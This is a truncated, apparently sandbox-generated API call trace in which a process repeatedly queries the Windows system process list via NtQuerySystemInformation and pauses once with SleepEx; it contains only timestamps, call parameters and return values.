[0167.400] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.401] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.406] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.406] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.407] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.408] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.408] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.409] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.409] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.410] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17478) returned 0x0 [0167.570] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16a98) returned 0x0 [0167.571] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16a98) returned 0x0 [0167.572] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16a98) returned 0x0 [0167.573] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16a98) returned 0x0 [0167.573] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16a98) returned 0x0 [0167.574] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16a98) returned 0x0 [0167.575] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16a98) returned 0x0 [0167.575] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16a98) returned 0x0 [0167.576] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16a98) returned 0x0 [0167.581] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16a98) returned 0x0 [0167.582] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16a98) returned 0x0 [0167.583] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16a98) returned 0x0 [0167.583] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16a98) returned 0x0 [0167.584] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16a98) returned 0x0 [0167.584] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16a98) returned 0x0 [0167.585] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16a98) returned 0x0 [0167.586] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16a98) returned 0x0 [0167.590] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16a98) returned 0x0 [0167.591] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16a98) returned 0x0 [0167.592] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16a98) returned 0x0 [0167.592] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16a98) returned 0x0 [0167.593] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16a98) returned 0x0 [0167.594] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16a98) returned 0x0 [0167.594] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16a98) returned 0x0 [0167.595] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16a98) returned 0x0 [0167.599] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16a98) returned 0x0 [0167.600] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16a98) returned 0x0 [0167.601] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16a98) returned 0x0 [0167.602] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16a98) returned 0x0 [0167.602] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16a98) returned 0x0 [0167.603] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16ad8) returned 0x0 [0167.657] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16b18) returned 0x0 [0167.658] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16b18) returned 0x0 [0167.664] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16b18) returned 0x0 [0167.664] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16b18) returned 0x0 [0167.665] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16b18) returned 0x0 [0167.667] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16b18) returned 0x0 [0167.667] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16b18) returned 0x0 [0167.668] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16b18) returned 0x0 [0167.668] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16b18) returned 0x0 [0167.669] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16b18) returned 0x0 [0167.674] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16b18) returned 0x0 [0167.675] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16b18) returned 0x0 [0167.676] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16b18) returned 0x0 [0167.676] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16b18) returned 0x0 [0167.677] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16b18) returned 0x0 [0167.677] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16b18) returned 0x0 [0167.678] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16b18) returned 0x0 [0167.679] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16b18) returned 0x0 [0167.686] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16b18) returned 0x0 [0167.687] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16b18) returned 0x0 [0167.687] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16b18) returned 0x0 [0167.688] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16b18) returned 0x0 [0167.689] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16b18) returned 0x0 [0167.689] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16b18) returned 0x0 [0167.690] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16b18) returned 0x0 [0167.691] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16b18) returned 0x0 [0167.738] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16b58) returned 0x0 [0167.740] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0170.278] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.279] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.280] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.280] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.281] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.282] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.282] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.287] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.288] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.289] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.289] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.290] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.291] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.291] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.292] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.298] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.298] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.299] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.300] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.300] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.301] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.302] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.302] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.307] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.308] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.308] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.309] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.310] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.310] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.311] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.312] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.392] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.393] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.394] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.394] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.395] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.396] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.397] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.397] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.402] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.403] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.403] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.404] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.404] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.405] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.406] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.406] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.407] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.411] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.412] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.413] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.413] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.414] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.415] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.415] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.416] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.423] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.424] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.425] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.426] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.426] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.462] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.463] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: 